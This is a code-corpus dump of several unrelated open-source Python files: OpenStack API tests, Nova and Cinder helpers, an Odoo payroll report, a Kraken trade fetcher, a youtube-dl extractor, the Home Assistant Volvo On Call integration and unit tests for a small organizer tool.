LOG.debug("_test_unparsable_data - fmt:%s - END", fmt)
def _test_multitenancy(self, fmt):
LOG.debug("_test_multitenancy - fmt:%s - START", fmt)
# creates a network for tenant self.tenant_id
net_id = self._create_network(fmt)
port_id = self._create_port(net_id, "ACTIVE", fmt)
invalid_tenant = self.tenant_id + "-invalid"
def assert_net_not_found(base_path, method, fmt):
content_type = "application/%s" % fmt
full_path = "%s.%s" % (base_path, fmt)
            req = testlib.create_request(full_path, None, content_type, method)
res = req.get_response(self.api)
self.assertEqual(res.status_int, self._network_not_found_code)
# new tenant should NOT see this network UUID
net_path = "/tenants/%(invalid_tenant)s/networks/%(net_id)s" % locals()
net_detail_path = net_path + "/detail"
assert_net_not_found(net_path, 'GET', fmt)
assert_net_not_found(net_path, 'PUT', fmt)
assert_net_not_found(net_path, 'DELETE', fmt)
assert_net_not_found(net_detail_path, 'GET', fmt)
# new tenant should NOT see this network + port UUID
port_all_path = net_path + "/ports"
port_path = "%s/%s" % (port_all_path, port_id)
port_detail_path = port_path + "/detail"
# NOTE: we actually still check for a network not found
# error here, as both the network and port in the URL are
# invalid. This is consistent with the test
# _test_show_port_networknotfound
assert_net_not_found(port_all_path, 'POST', fmt)
assert_net_not_found(port_all_path, 'GET', fmt)
assert_net_not_found(port_path, 'GET', fmt)
assert_net_not_found(port_path, 'PUT', fmt)
assert_net_not_found(port_path, 'DELETE', fmt)
assert_net_not_found(port_detail_path, 'GET', fmt)
attach_path = port_path + "/attachment"
assert_net_not_found(attach_path, 'GET', fmt)
assert_net_not_found(attach_path, 'PUT', fmt)
assert_net_not_found(attach_path, 'DELETE', fmt)
LOG.debug("_test_multitenancy - fmt:%s - END", fmt)
def test_list_networks_json(self):
self._test_list_networks('json')
def test_list_networks_xml(self):
self._test_list_networks('xml')
def test_list_networks_detail_json(self):
self._test_list_networks_detail('json')
def test_list_networks_detail_xml(self):
self._test_list_networks_detail('xml')
def test_create_network_json(self):
self._test_create_network('json')
def test_create_network_xml(self):
self._test_create_network('xml')
def test_create_network_badrequest_json(self):
self._test_create_network_badrequest('json')
def test_create_network_badrequest_xml(self):
self._test_create_network_badrequest('xml')
def test_show_network_not_found_json(self):
self._test_show_network_not_found('json')
def test_show_network_not_found_xml(self):
self._test_show_network_not_found('xml')
def test_show_network_json(self):
self._test_show_network('json')
def test_show_network_xml(self):
self._test_show_network('xml')
def test_show_network_detail_json(self):
self._test_show_network_detail('json')
def test_show_network_detail_xml(self):
self._test_show_network_detail('xml')
def test_delete_network_json(self):
self._test_delete_network('json')
def test_delete_network_xml(self):
self._test_delete_network('xml')
def test_rename_network_json(self):
self._test_rename_network('json')
def test_rename_network_xml(self):
self._test_rename_network('xml')
def test_rename_network_badrequest_json(self):
self._test_rename_network_badrequest('json')
def test_rename_network_badrequest_xml(self):
self._test_rename_network_badrequest('xml')
def test_rename_network_not_found_json(self):
self._test_rename_network_not_found('json')
def test_rename_network_not_found_xml(self):
self._test_rename_network_not_found('xml')
def test_delete_network_in_use_json(self):
self._test_delete_network_in_use('json')
def test_delete_network_in_use_xml(self):
self._test_delete_network_in_use('xml')
def test_delete_network_with_unattached_port_xml(self):
self._test_delete_network_with_unattached_port('xml')
def test_delete_network_with_unattached_port_json(self):
self._test_delete_network_with_unattached_port('json')
def test_list_ports_json(self):
self._test_list_ports('json')
def test_list_ports_xml(self):
self._test_list_ports('xml')
def test_list_ports_networknotfound_json(self):
self._test_list_ports_networknotfound('json')
def test_list_ports_networknotfound_xml(self):
self._test_list_ports_networknotfound('xml')
def test_list_ports_detail_json(self):
self._test_list_ports_detail('json')
def test_list_ports_detail_xml(self):
self._test_list_ports_detail('xml')
def test_show_port_json(self):
self._test_show_port('json')
def test_show_port_xml(self):
self._test_show_port('xml')
def test_show_port_detail_json(self):
self._test_show_port_detail('json')
def test_show_port_detail_xml(self):
self._test_show_port_detail('xml')
def test_show_port_networknotfound_json(self):
self._test_show_port_networknotfound('json')
def test_show_port_networknotfound_xml(self):
self._test_show_port_networknotfound('xml')
def test_show_port_portnotfound_json(self):
self._test_show_port_portnotfound('json')
def test_show_port_portnotfound_xml(self):
self._test_show_port_portnotfound('xml')
def test_create_port_json(self):
self._test_create_port('json')
def test_create_port_xml(self):
self._test_create_port('xml')
def test_create_port_noreqbody_json(self):
self._test_create_port_noreqbody('json')
def test_create_port_noreqbody_xml(self):
self._test_create_port_noreqbody('xml')
def test_create_port_networknotfound_json(self):
self._test_create_port_networknotfound('json')
def test_create_port_networknotfound_xml(self):
self._test_create_port_networknotfound('xml')
def test_create_port_badrequest_json(self):
self._test_create_port_badrequest('json')
def test_create_port_badrequest_xml(self):
self._test_create_port_badrequest('xml')
def test_create_port_badportstate_json(self):
self._test_create_port_badportstate('json')
def test_create_port_badportstate_xml(self):
self._test_create_port_badportstate('xml')
def test_delete_port_xml(self):
self._test_delete_port('xml')
def test_delete_port_json(self):
self._test_delete_port('json')
def test_delete_port_in_use_xml(self):
self._test_delete_port_in_use('xml')
def test_delete_port_in_use_json(self):
self._test_delete_port_in_use('json')
def test_delete_port_networknotfound_xml(self):
self._test_delete_port_networknotfound('xml')
def test_delete_port_networknotfound_json(self):
self._test_delete_port_networknotfound('json')
def test_delete_port_with_bad_id_xml(self):
self._test_delete_port_with_bad_id('xml')
def test_delete_port_with_bad_id_json(self):
self._test_delete_port_with_bad_id('json')
def test_set_port_state_xml(self):
self._test_set_port_state('xml')
def test_set_port_state_json(self):
self._test_set_port_state('json')
def test_set_port_state_networknotfound_xml(self):
self._test_set_port_state_networknotfound('xml')
def test_set_port_state_networknotfound_json(self):
self._test_set_port_state_networknotfound('json')
def test_set_port_state_portnotfound_xml(self):
self._test_set_port_state_portnotfound('xml')
def test_set_port_state_portnotfound_json(self):
self._test_set_port_state_portnotfound('json')
def test_set_port_state_stateinvalid_xml(self):
self._test_set_port_state_stateinvalid('xml')
def test_set_port_state_stateinvalid_json(self):
self._test_set_port_state_stateinvalid('json')
def test_show_attachment_xml(self):
self._test_show_attachment('xml')
def test_show_attachment_json(self):
self._test_show_attachment('json')
def test_show_attachment_none_set_xml(self):
self._test_show_attachment_none_set('xml')
def test_show_attachment_none_set_json(self):
self._test_show_attachment_none_set('json')
def test_show_attachment_networknotfound_xml(self):
self._test_show_attachment_networknotfound('xml')
def test_show_attachment_networknotfound_json(self):
self._test_show_attachment_networknotfound('json')
def test_show_attachment_portnotfound_xml(self):
self._test_show_attachment_portnotfound('xml')
def test_show_attachment_portnotfound_json(self):
self._test_show_attachment_portnotfound('json')
def test_put_attachment_xml(self):
self._test_put_attachment('xml')
def test_put_attachment_json(self):
self._test_put_attachment('json')
def test_put_attachment_networknotfound_xml(self):
self._test_put_attachment_networknotfound('xml')
def test_put_attachment_networknotfound_json(self):
self._test_put_attachment_networknotfound('json')
def test_put_attachment_portnotfound_xml(self):
self._test_put_attachment_portnotfound('xml')
def test_put_attachment_portnotfound_json(self):
self._test_put_attachment_portnotfound('json')
def test_delete_attachment_xml(self):
self._test_delete_attachment('xml')
def test_delete_attachment_json(self):
self._test_delete_attachment('json')
def test_delete_attachment_networknotfound_xml(self):
self._test_delete_attachment_networknotfound('xml')
def test_delete_attachment_networknotfound_json(self):
self._test_delete_attachment_networknotfound('json')
def test_delete_attachment_portnotfound_xml(self):
self._test_delete_attachment_portnotfound('xml')
def test_delete_attachment_portnotfound_json(self):
self._test_delete_attachment_portnotfound('json')
def test_unparsable_data_xml(self):
self._test_unparsable_data('xml')
def test_unparsable_data_json(self):
self._test_unparsable_data('json')
def test_multitenancy_xml(self):
self._test_multitenancy('xml')
def test_multitenancy_json(self):
self._test_multitenancy('json')
def test_internal_error(self):
"""Check that internal errors do not leak.
Any internal, unexpected error should be turned into a 500 response
without any traces of the original exception.
"""
orig_exception_msg = "An exception with a traceback"
@APIFaultWrapper()
def raise_exception(self, *args, **kwargs):
raise Exception(orig_exception_msg)
list_network_req = testlib.network_list_request(self.tenant_id, "json")
with mock.patch.object(Controller, 'index', new=raise_exception):
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 500)
self.assertNotIn(orig_exception_msg, list_network_res.body)
|
duhzecca/cinder | refs/heads/master | cinder/tests/unit/fake_vmem_client.py | 23 | # Copyright 2014 Violin Memory, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake VMEM REST client for testing drivers.
"""
import sys
import mock
# The following gymnastics to fake an exception class globally are done because
# we want to globally model and make available certain exceptions. If we do
# not do this, then the real driver's import will not see our fakes.
class NoMatchingObjectIdError(Exception):
pass
error = mock.Mock()
error.NoMatchingObjectIdError = NoMatchingObjectIdError
core = mock.Mock()
core.attach_mock(error, 'error')
vmemclient = mock.Mock()
vmemclient.__version__ = "unknown"
vmemclient.attach_mock(core, 'core')
sys.modules['vmemclient'] = vmemclient
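# Illustrative only (not part of the fakes themselves): because the fake module
# is installed in sys.modules above, a later `import vmemclient` in the real
# driver resolves to this Mock, so e.g.
# vmemclient.core.error.NoMatchingObjectIdError refers to the fake exception
# class defined here rather than to the real library's class.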
mock_client_conf = [
'basic',
'basic.login',
'basic.get_node_values',
'basic.save_config',
'lun',
'lun.export_lun',
'lun.unexport_lun',
'snapshot',
'snapshot.export_lun_snapshot',
'snapshot.unexport_lun_snapshot',
'iscsi',
'iscsi.bind_ip_to_target',
'iscsi.create_iscsi_target',
'iscsi.delete_iscsi_target',
'igroup',
'client',
'client.get_client_info',
'client.create_client',
'client.delete_client',
'adapter',
'adapter.get_fc_info'
]
|
double12gzh/nova | refs/heads/master | nova/cells/opts.py | 6 | # Copyright (c) 2012 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Global cells config options
"""
from oslo_config import cfg
cells_opts = [
cfg.BoolOpt('enable',
default=False,
help='Enable cell functionality'),
cfg.StrOpt('topic',
default='cells',
help='The topic cells nodes listen on'),
cfg.StrOpt('manager',
default='nova.cells.manager.CellsManager',
help='Manager for cells'),
cfg.StrOpt('name',
default='nova',
help='Name of this cell'),
cfg.ListOpt('capabilities',
default=['hypervisor=xenserver;kvm', 'os=linux;windows'],
help='Key/Multi-value list with the capabilities of the cell'),
cfg.IntOpt('call_timeout',
default=60,
help='Seconds to wait for response from a call to a cell.'),
cfg.FloatOpt('reserve_percent',
default=10.0,
help='Percentage of cell capacity to hold in reserve. '
'Affects both memory and disk utilization'),
cfg.StrOpt('cell_type',
default='compute',
choices=('api', 'compute'),
help='Type of cell'),
cfg.IntOpt("mute_child_interval",
default=300,
help='Number of seconds after which a lack of capability and '
'capacity updates signals the child cell is to be '
'treated as a mute.'),
cfg.IntOpt('bandwidth_update_interval',
default=600,
help='Seconds between bandwidth updates for cells.'),
]
CONF = cfg.CONF
CONF.register_opts(cells_opts, group='cells')
def get_cell_type():
"""Return the cell type, 'api', 'compute', or None (if cells is disabled).
"""
if not CONF.cells.enable:
return
return CONF.cells.cell_type
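# Illustrative usage (not part of this module): once the options are registered
# above, they can be read anywhere through the global CONF object, e.g.
#   from nova.cells import opts as cells_opts
#   if cells_opts.get_cell_type() == 'api':
#       pass  # e.g. route the request down to child cells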
|
orchidinfosys/odoo | refs/heads/master | addons/l10n_in_hr_payroll/report/report_hr_salary_employee_bymonth.py | 47 | #-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import datetime
import time
from openerp.osv import osv
from openerp.report import report_sxw
class report_hr_salary_employee_bymonth(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(report_hr_salary_employee_bymonth, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'get_employee': self.get_employee,
'get_periods': self.get_periods,
'get_months_tol': self.get_months_tol,
'get_total': self.get_total,
})
self.context = context
self.mnths = []
self.mnths_total = []
self.total = 0.0
def get_periods(self, form):
# Get start year-month-date and end year-month-date
first_year = int(form['start_date'][0:4])
last_year = int(form['end_date'][0:4])
first_month = int(form['start_date'][5:7])
last_month = int(form['end_date'][5:7])
no_months = (last_year-first_year) * 12 + last_month - first_month + 1
current_month = first_month
current_year = first_year
# Get name of the months from integer
mnth_name = []
for count in range(0, no_months):
m = datetime.date(current_year, current_month, 1).strftime('%b')
mnth_name.append(m)
self.mnths.append(str(current_month) + '-' + str(current_year))
if current_month == 12:
current_month = 0
current_year = last_year
current_month = current_month + 1
for c in range(0, (12-no_months)):
mnth_name.append('')
self.mnths.append('')
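        # Worked example (illustrative): start_date='2013-11-01' and
        # end_date='2014-02-28' give no_months=4, self.mnths becomes
        # ['11-2013', '12-2013', '1-2014', '2-2014'] padded with '' to twelve
        # entries, and the returned row is ['Nov', 'Dec', 'Jan', 'Feb', '', ...].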
return [mnth_name]
def get_salary(self, form, emp_id, emp_salary, total_mnths):
category_id = form.get('category_id', [])
category_id = category_id and category_id[0] or False
self.cr.execute("select to_char(date_to,'mm-yyyy') as to_date ,sum(pl.total) \
from hr_payslip_line as pl \
left join hr_payslip as p on pl.slip_id = p.id \
left join hr_employee as emp on emp.id = p.employee_id \
left join resource_resource as r on r.id = emp.resource_id \
where p.state = 'done' and p.employee_id = %s and pl.category_id = %s \
group by r.name, p.date_to,emp.id",(emp_id, category_id,))
sal = self.cr.fetchall()
salary = dict(sal)
total = 0.0
cnt = 0
for month in self.mnths:
            if month != '':
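                # The SQL keys come from to_char(date_to, 'mm-yyyy') and are
                # zero padded; pad the locally built '<m>-<yyyy>' key so the
                # lookup below matches.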
if len(month) != 7:
month = '0' + str(month)
if month in salary and salary[month]:
emp_salary.append(salary[month])
total += salary[month]
total_mnths[cnt] = total_mnths[cnt] + salary[month]
else:
emp_salary.append(0.00)
else:
emp_salary.append('')
total_mnths[cnt] = ''
cnt = cnt + 1
return emp_salary, total, total_mnths
def get_employee(self, form):
emp_salary = []
salary_list = []
total_mnths=[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
emp_obj = self.pool.get('hr.employee')
emp_ids = form.get('employee_ids', [])
employees = emp_obj.browse(self.cr, self.uid, emp_ids, context=self.context)
for emp_id in employees:
emp_salary.append(emp_id.name)
total = 0.0
emp_salary, total, total_mnths = self.get_salary(form, emp_id.id, emp_salary, total_mnths)
emp_salary.append(total)
salary_list.append(emp_salary)
emp_salary = []
self.mnths_total.append(total_mnths)
return salary_list
def get_months_tol(self):
return self.mnths_total
def get_total(self):
for item in self.mnths_total:
for count in range(1, len(item)):
if item[count] == '':
continue
self.total += item[count]
return self.total
class wrapped_report_employee_salary_bymonth(osv.AbstractModel):
_name = 'report.l10n_in_hr_payroll.report_hrsalarybymonth'
_inherit = 'report.abstract_report'
_template = 'l10n_in_hr_payroll.report_hrsalarybymonth'
_wrapped_report_class = report_hr_salary_employee_bymonth
|
sebschre/cryptoAssetManager | refs/heads/master | fillKrakenDB.py | 1 | #!/usr/bin/env python3
import sys
from QueryPublic import QueryPublicKraken
from Trade import Trade, TradeList
from DBConnections import KrakenDBConnection
from datetime import datetime, timedelta
query = QueryPublicKraken()
with KrakenDBConnection() as dbconn:
try:
cursor = dbconn.cursor()
cursor.execute("SELECT unixtime FROM TRADESXETHZEUR ORDER BY unixtime DESC LIMIT 1")
lasttimestamp = cursor.fetchone()[0]
sinceTime = query.unixtime2datetime(lasttimestamp)
    except:
        # No trades stored yet: start from the beginning of the history
        # (since=0 is assumed to mean "from the start" for the query below).
        sinceTime = datetime(1990, 1, 1, 1, 0, 0, 0)
        lasttimestamp = 0
finally:
cursor.close()
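# Page through the public trades endpoint (roughly 1000 trades per call),
# advancing the 'since' cursor just past the last trade returned, until the
# history catches up with today.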
while sinceTime < datetime.today():
try:
print(sinceTime)
tradesXETHZEUR, to_ns = query.tradesOneThousand(pair = 'XETHZEUR', since_ns = lasttimestamp)
tradeList = TradeList(tradesXETHZEUR)
tradeList.saveInDB()
lasttimestamp = int(to_ns) + 1
sinceTime = query.unixtime2datetime(lasttimestamp)
except (KeyboardInterrupt, SystemExit):
print("KeyboardInterrrupt, Bye!")
sys.exit()
except:
pass
|
expobrain/python-unotifier | refs/heads/master | unotifier/notifiers/notifysend.py | 1 | from __future__ import unicode_literals
import os
from .. import VENDOR_PATH
from .abstract import AbstractNotifier
class NotifySendNotifier(AbstractNotifier):
notifier_cmd = os.path.join(VENDOR_PATH, 'notify-send')
def get_cmd_options(self, options):
options = self._map_app_icon(options)
options = self._map_text(options)
return options
|
mikemow/youtube-dl | refs/heads/master | youtube_dl/extractor/sztvhu.py | 148 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .common import InfoExtractor
class SztvHuIE(InfoExtractor):
_VALID_URL = r'http://(?:(?:www\.)?sztv\.hu|www\.tvszombathely\.hu)/(?:[^/]+)/.+-(?P<id>[0-9]+)'
_TEST = {
'url': 'http://sztv.hu/hirek/cserkeszek-nepszerusitettek-a-kornyezettudatos-eletmodot-a-savaria-teren-20130909',
'md5': 'a6df607b11fb07d0e9f2ad94613375cb',
'info_dict': {
'id': '20130909',
'ext': 'mp4',
'title': 'Cserkészek népszerűsítették a környezettudatos életmódot a Savaria téren',
'description': 'A zöld nap játékos ismeretterjesztő programjait a Magyar Cserkész Szövetség szervezte, akik az ország nyolc városában adják át tudásukat az érdeklődőknek. A PET...',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_file = self._search_regex(
r'file: "...:(.*?)",', webpage, 'video file')
title = self._html_search_regex(
r'<meta name="title" content="([^"]*?) - [^-]*? - [^-]*?"',
webpage, 'video title')
description = self._html_search_regex(
r'<meta name="description" content="([^"]*)"/>',
webpage, 'video description', fatal=False)
thumbnail = self._og_search_thumbnail(webpage)
video_url = 'http://media.sztv.hu/vod/' + video_file
return {
'id': video_id,
'url': video_url,
'title': title,
'description': description,
'thumbnail': thumbnail,
}
|
home-assistant/home-assistant | refs/heads/dev | homeassistant/components/volvooncall/__init__.py | 5 | """Support for Volvo On Call."""
from datetime import timedelta
import logging
import voluptuous as vol
from volvooncall import Connection
from homeassistant.const import (
CONF_NAME,
CONF_PASSWORD,
CONF_REGION,
CONF_RESOURCES,
CONF_SCAN_INTERVAL,
CONF_USERNAME,
)
from homeassistant.helpers import discovery
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.util.dt import utcnow
DOMAIN = "volvooncall"
DATA_KEY = DOMAIN
_LOGGER = logging.getLogger(__name__)
MIN_UPDATE_INTERVAL = timedelta(minutes=1)
DEFAULT_UPDATE_INTERVAL = timedelta(minutes=1)
CONF_SERVICE_URL = "service_url"
CONF_SCANDINAVIAN_MILES = "scandinavian_miles"
CONF_MUTABLE = "mutable"
SIGNAL_STATE_UPDATED = f"{DOMAIN}.updated"
PLATFORMS = {
"sensor": "sensor",
"binary_sensor": "binary_sensor",
"lock": "lock",
"device_tracker": "device_tracker",
"switch": "switch",
}
RESOURCES = [
"position",
"lock",
"heater",
"odometer",
"trip_meter1",
"trip_meter2",
"average_speed",
"fuel_amount",
"fuel_amount_level",
"average_fuel_consumption",
"distance_to_empty",
"washer_fluid_level",
"brake_fluid",
"service_warning_status",
"bulb_failures",
"battery_range",
"battery_level",
"time_to_fully_charged",
"battery_charge_status",
"engine_start",
"last_trip",
"is_engine_running",
"doors_hood_open",
"doors_tailgate_open",
"doors_front_left_door_open",
"doors_front_right_door_open",
"doors_rear_left_door_open",
"doors_rear_right_door_open",
"windows_front_left_window_open",
"windows_front_right_window_open",
"windows_rear_left_window_open",
"windows_rear_right_window_open",
"tyre_pressure_front_left_tyre_pressure",
"tyre_pressure_front_right_tyre_pressure",
"tyre_pressure_rear_left_tyre_pressure",
"tyre_pressure_rear_right_tyre_pressure",
"any_door_open",
"any_window_open",
]
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_UPDATE_INTERVAL
): vol.All(cv.time_period, vol.Clamp(min=MIN_UPDATE_INTERVAL)),
vol.Optional(CONF_NAME, default={}): cv.schema_with_slug_keys(
cv.string
),
vol.Optional(CONF_RESOURCES): vol.All(
cv.ensure_list, [vol.In(RESOURCES)]
),
vol.Optional(CONF_REGION): cv.string,
vol.Optional(CONF_SERVICE_URL): cv.string,
vol.Optional(CONF_MUTABLE, default=True): cv.boolean,
vol.Optional(CONF_SCANDINAVIAN_MILES, default=False): cv.boolean,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Volvo On Call component."""
session = async_get_clientsession(hass)
connection = Connection(
session=session,
username=config[DOMAIN].get(CONF_USERNAME),
password=config[DOMAIN].get(CONF_PASSWORD),
service_url=config[DOMAIN].get(CONF_SERVICE_URL),
region=config[DOMAIN].get(CONF_REGION),
)
interval = config[DOMAIN][CONF_SCAN_INTERVAL]
data = hass.data[DATA_KEY] = VolvoData(config)
def is_enabled(attr):
"""Return true if the user has enabled the resource."""
return attr in config[DOMAIN].get(CONF_RESOURCES, [attr])
def discover_vehicle(vehicle):
"""Load relevant platforms."""
data.vehicles.add(vehicle.vin)
dashboard = vehicle.dashboard(
mutable=config[DOMAIN][CONF_MUTABLE],
scandinavian_miles=config[DOMAIN][CONF_SCANDINAVIAN_MILES],
)
for instrument in (
instrument
for instrument in dashboard.instruments
if instrument.component in PLATFORMS and is_enabled(instrument.slug_attr)
):
data.instruments.add(instrument)
hass.async_create_task(
discovery.async_load_platform(
hass,
PLATFORMS[instrument.component],
DOMAIN,
(vehicle.vin, instrument.component, instrument.attr),
config,
)
)
async def update(now):
"""Update status from the online service."""
try:
if not await connection.update(journal=True):
_LOGGER.warning("Could not query server")
return False
for vehicle in connection.vehicles:
if vehicle.vin not in data.vehicles:
discover_vehicle(vehicle)
async_dispatcher_send(hass, SIGNAL_STATE_UPDATED)
return True
finally:
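            # Always schedule the next poll so a failed or short-circuited
            # update does not stop the polling loop.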
async_track_point_in_utc_time(hass, update, utcnow() + interval)
_LOGGER.info("Logging in to service")
return await update(utcnow())
class VolvoData:
"""Hold component state."""
def __init__(self, config):
"""Initialize the component state."""
self.vehicles = set()
self.instruments = set()
self.config = config[DOMAIN]
self.names = self.config.get(CONF_NAME)
def instrument(self, vin, component, attr):
"""Return corresponding instrument."""
return next(
(
instrument
for instrument in self.instruments
if instrument.vehicle.vin == vin
and instrument.component == component
and instrument.attr == attr
),
None,
)
def vehicle_name(self, vehicle):
"""Provide a friendly name for a vehicle."""
if (
vehicle.registration_number and vehicle.registration_number.lower()
) in self.names:
return self.names[vehicle.registration_number.lower()]
if vehicle.vin and vehicle.vin.lower() in self.names:
return self.names[vehicle.vin.lower()]
if vehicle.registration_number:
return vehicle.registration_number
if vehicle.vin:
return vehicle.vin
return ""
class VolvoEntity(Entity):
"""Base class for all VOC entities."""
def __init__(self, data, vin, component, attribute):
"""Initialize the entity."""
self.data = data
self.vin = vin
self.component = component
self.attribute = attribute
async def async_added_to_hass(self):
"""Register update dispatcher."""
self.async_on_remove(
async_dispatcher_connect(
self.hass, SIGNAL_STATE_UPDATED, self.async_write_ha_state
)
)
@property
def instrument(self):
"""Return corresponding instrument."""
return self.data.instrument(self.vin, self.component, self.attribute)
@property
def icon(self):
"""Return the icon."""
return self.instrument.icon
@property
def vehicle(self):
"""Return vehicle."""
return self.instrument.vehicle
@property
def _entity_name(self):
return self.instrument.name
@property
def _vehicle_name(self):
return self.data.vehicle_name(self.vehicle)
@property
def name(self):
"""Return full name of the entity."""
return f"{self._vehicle_name} {self._entity_name}"
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
return dict(
self.instrument.attributes,
model=f"{self.vehicle.vehicle_type}/{self.vehicle.model_year}",
)
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return f"{self.vin}-{self.component}-{self.attribute}"
|
marksweiss/organize-m | refs/heads/master | test/organizem_test.py | 1 | import unittest
import sys
sys.path.insert(0, '..')
from lib.item import Item, Elem
from lib.organizem import Organizem, Conf
from lib.orgm_controller_base import ActionArg
TEST_DATA_FILE = "orgm_test.dat"
TEST_BAK_FILE = "orgm_test_bak.dat"
IS_UNIT_TESTING = True
Organizem(TEST_DATA_FILE, IS_UNIT_TESTING).setconf(Conf.BAK_FILE, TEST_BAK_FILE)
class OrganizemTestCase(unittest.TestCase):
# Helpers
def _init_test_data_file(self):
with open(TEST_DATA_FILE, 'w') as f:
item = Item("TEST_ITEM")
f.write(str(item))
# Tests
def test_init_item(self):
title = "title"
item = Item(title)
self.assertTrue(item != None)
self.assertTrue(isinstance(item, Item))
self.assertTrue(item.title == title)
def test_init_organizem(self):
self._init_test_data_file()
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
self.assertTrue(orgm != None)
self.assertTrue(isinstance(orgm, Organizem))
self.assertTrue(orgm.data_file == TEST_DATA_FILE)
def test_add_item__find_item_by_title(self):
self._init_test_data_file()
title = "title"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, title))
def test_add_item__find_rgx_item_by_title(self):
self._init_test_data_file()
title = "title"
rgx_match = "titl*"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_area(self):
self._init_test_data_file()
title = "title"
area = "my area"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, area))
def test_add_item__find_rgx_item_by_area(self):
self._init_test_data_file()
title = "title"
area = "area"
rgx_match = "are*"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "my project"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, project))
def test_add_item__find_rgx_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "my project"
rgx_match = "my proj*"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_tags(self):
self._init_test_data_file()
title = "title"
        # Test case of single-value passed to find_items() for an
# element that is stored in item as a list (tags)
tag1 = 'tag 1'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
        # Test case of multi-value list passed to find_items() for an
# element that is stored in item as a list (tags)
tag2 = 'tag 2'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
self.assertTrue(orgm.find_items(Elem.TAGS, tags2))
def test_add_item__find_rgx_items_by_tags(self):
self._init_test_data_file()
title = "title"
        # Test case of single-value passed to find_items() for an
# element that is stored in item as a list (tags)
tag1 = 'tag 1001'
tag1_rgx = 'tag 100*'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1_rgx, use_regex_match=True))
        # Test case of multi-value list passed to find_items() for an
# element that is stored in item as a list (tags)
tag2 = 'tag 1012'
tag2_rgx = 'tag 101*'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2_rgx, use_regex_match=True))
def test_add_item__find_items_by_actions(self):
self._init_test_data_file()
title = "title"
action1 = 'action 100'
action1_rgx = 'action 10*'
actions1 = [action1]
        # TODO FIX ALL THESE Item() ctor calls
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True))
action2 = 'action 200'
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))
def test_add_item__find_rgx_items_by_actions(self):
self._init_test_data_file()
title = "title"
